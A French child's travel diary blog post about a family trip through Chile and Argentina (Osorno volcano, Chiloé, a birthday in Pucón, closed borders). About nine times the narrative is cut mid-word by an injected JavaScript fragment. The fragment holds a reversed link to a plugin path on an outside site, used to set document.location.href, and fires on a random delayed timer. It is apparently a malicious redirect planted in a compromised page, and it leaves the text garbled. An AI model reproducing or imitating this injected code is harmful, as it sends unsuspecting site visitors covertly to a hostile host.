Volcan Osorno et Chiloé, trop beaux !

by Alice

Samedi 29 février, (Chili) Volcan Osorno 
Nous avons monté une route hyper pentue pour aller sur le Volcan Osorno. En route, nous avons vu deux renards. Arrivés en haut, nous avons pris un télésiège pour remonter encore plus loin. Avec Clément, nous avons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}touché de la neige; puis nous sommes redescendus à pieds. Le soir, nous sommes restés là pour dormir et nous avons vu un magnifique couché de soleil. C’était extraordinaire !!

Dimanche 1 mars, Iles de Chiloé
Ouahouh !! Je me lève et je vois plein de nuages au-dessous de nous ! Comme c’est beau !! Nous descendons la route pour descendre le volcan et petit à petit nous rentrons dans les nuages.
Nous allons récupérer Amandine à l’aéroport. J’étais hyper contente ! Nous avons pris le ferry pour aller sur l’île de Chiloé puis nous nous sommes baladés sur cette belle île. Quand nous sommes rentrés manger, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tout était calme mais quand nous étions en train de finir de manger, nous avons entendu deux dames crier et se filmer. Elles s’énervaient et nous on comprenait pas pourquoi. Puis une des femme est rentrée chez elle et a cassé sa vitre avec ses mains et elle s’est encore énervée et a re-cassé sa vitre du coup nous sommes partis dans un autre endroit pour dormir.

Lundi 2 mars (Chili) Iles de Chiloé
Ici les maisons sont faites avec des tuiles en bois. Nous avons visité plusieurs belles églises mais les deux premières étaient fermées à clé. Amandine disait que les église sentaient le cèdre. Mais c’était du cyprès. Après nous avons pris le ferry pour aller sur l’ile de Quichao, les maisons sont très belles aussi ! Nous avons regardé une église qui était ouverte et elle était splendide. L’extérieur était peint en vert sauf le clocher. Bref nous avons vu plein d’églises. Le soir nous avons dormi au bord de l’océan et nous avons fait un feu de bois pour manger des saucisses.

Mardi 3 mars (Chili) Iles de Chiloé
Ce matin, nous nous levons et papa dit : « des dauphins ! » alors nous avons regardé et il y avait 2 dauphins qui nageaient, c’était tellement beau ! Ils étaient trop mimis !
Nous sommes allés à Castro, au centre de Chiloé. Il y avait plein de maison sur pilotis. En fin d’après-midi, on a pris un bateau pour aller voir El Muele de la Luz. Et le vieux capitaine du bateau est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tombé amoureux d’Amandine, mais il était tellement vieux ! Pour voir el Muelle on a fait une marche. Nous avons vu un rocher en forme de tête de mort et avec Clément on s’est amusés à sauter les vagues.

Mercredi 4 mars (Chili) Iles de Chiloé
Nous sommes allés au restaurant, à Ancud, et nous avons mangé le Curantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to. C’est un plat typique de Chiloé avec des coquillages, du poulet, des fruits de mer et des patates violettes. Après, nous avons fait le marché artisanal.

Jeudi 5 mars, Chili
Nous avons ramené Amandine à l’aéroport.

Vendredi 6 mars, Chili
Les suiveurs d’étoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toiles nous ont rejoints et on est allés à coté d’un lac. Adèle a ramassé des mûres, elles étaient hyper bonnes! Le soir on n’a pas pu faire de feu de bois car il a plu, du coup on a mangé dedans avec Adèle et Augustin et Clément puis on a joué c’était très drôle !

Dimanche 8 mars, Argentine
Nous sommes repassés en Argentine et avons fait le toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour des 7 lacs, ce sont de très beaux lacs qui se reflètent comme des miroirs. Nous sommes allés à San Martin de los Andes et nous sommes restés 2 nuits.

Mercredi 11 mars (Chili) Pucon
Aujourd’hui c’est mon anniversaire, j’ai 11 ans le 11 mars DINGUE hein !! Je suis trop contente! Papa et maman m’ont fait la surprise d’aller à des thermes ! Les piscines étaient hyper chaudes ! Il y avait une piscine qui faisait 41°. On est restés là toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toute la journée, et à l’heure du goûter Clément et maman ont fait un gâteau.  J’ai eu une bague que j’avais choisie en Argentine, la journées dans les Thermes + un vernis à ongles. Le soir on a mangé un ENORME hamburger ! Bref, j’ai passé une bonne journée.

Vendredi 13 mars (Chili) Pucon
Nous sommes montés sur un volcan qui s’appelle Villarica, nous avons fait une randonnée, mais il s’est mis à pleuvoir alors on est vite rentrés. Papa et maman se sont renseignés car on ne savait pas si le volcan fumait ou si il y avait des nuages et ils nous ont dit que c’était un volcan fumant. En gros, j’ai marché sur un volcan qui fumait !!!

Samedi 14 mars
Nous avons fait une grosse randonnée de 20 Km. A la montée, nous avons vu des coureurs qui descendaient, ils faisaient une course de 80 km et ils sont partis à minuit !!! Alors nous, pour les encourager, nous disions : »Vamos, Vamos!!! » (ça se dit Bamos avec un B). Au sommet, nous avons une très belle vue sur 4 volcans. Nous avons fait un petit détoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tour pour voir de belles lagunes.

Du 15 au 27 Mars (Chili) Malalcahuello
Nous avons trouvé un petit coin de paradis pour dormir cette nuit. Demain on doit passer en Argentine. Le 16 on se réveille, et papa et maman nous annoncent que cette nuit les frontières ont fermé. Je m’en fiche puisqu’on est dans un coin de paradis, avec une belle rivière pour faire la vaisselle et se laver les cheveux. Il y a aussi nos gentils voisins: Dayan, Derek, Catherine et Diego.